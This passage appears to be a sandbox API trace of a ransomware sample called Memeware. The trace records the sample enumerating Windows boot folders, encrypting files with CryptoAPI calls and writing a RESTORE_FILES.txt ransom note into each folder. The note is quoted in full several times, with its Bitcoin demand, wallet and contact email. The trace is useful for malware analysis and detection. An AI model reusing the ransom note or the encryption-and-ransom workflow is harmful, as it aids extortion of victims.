(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.696] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.696] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.696] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.696] CloseHandle (hObject=0xac) returned 1 [0044.696] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="Program Files") returned -1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="Program Files (x86)") returned -1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="$Recycle.bin") returned 1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="System Volume Information") returned -1 [0044.696] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0044.696] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0044.696] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0044.696] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0044.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.697] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.697] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.697] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.697] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.697] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.697] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0044.697] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.697] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.697] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.697] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.697] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.698] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0044.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.698] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.698] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0044.698] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.698] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.698] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.698] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.698] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.698] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.698] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\RESTORE_FILES.txt") returned 35 [0044.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\RESTORE_FILES.txt" (normalized: "c:\\boot\\it-it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.698] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.698] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.699] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.699] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.699] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.699] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.699] CloseHandle (hObject=0xac) returned 1 [0044.699] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.699] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0044.699] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files") returned -1 [0044.699] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1="ja-JP", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1="ja-JP", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0044.700] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0044.700] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0044.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.700] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.700] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.700] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0044.700] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.700] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.700] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.700] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.700] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0044.700] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.700] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0044.700] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.700] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.700] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.700] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.701] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.701] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.701] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\RESTORE_FILES.txt") returned 35 [0044.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\RESTORE_FILES.txt" (normalized: "c:\\boot\\ja-jp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.701] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.701] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.702] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.702] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.702] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.702] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.702] CloseHandle (hObject=0xac) returned 1 [0044.702] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files") returned -1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files (x86)") returned -1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="$Recycle.bin") returned 1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="System Volume Information") returned -1 [0044.702] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0044.702] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0044.702] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0044.702] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0044.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.703] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.703] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.703] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.703] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.703] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.703] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0044.703] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.703] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.703] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.703] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.704] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0044.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.704] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.704] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0044.704] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.704] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.704] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.704] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.704] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.704] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\RESTORE_FILES.txt") returned 35 [0044.704] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\ko-kr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.704] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.704] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.705] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.705] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.705] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.705] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.705] CloseHandle (hObject=0xac) returned 1 [0044.705] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="Windows") returned -1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="Program Files") returned -1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="Program Files (x86)") returned -1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="$Recycle.bin") returned 1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="System Volume Information") returned -1 [0044.706] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0044.706] StrStrIW (lpFirst="memtest.exe", lpSrch=".protected") returned 0x0 [0044.706] lstrcmpW (lpString1="memtest.exe", lpString2="RESTORE_FILES.txt") returned -1 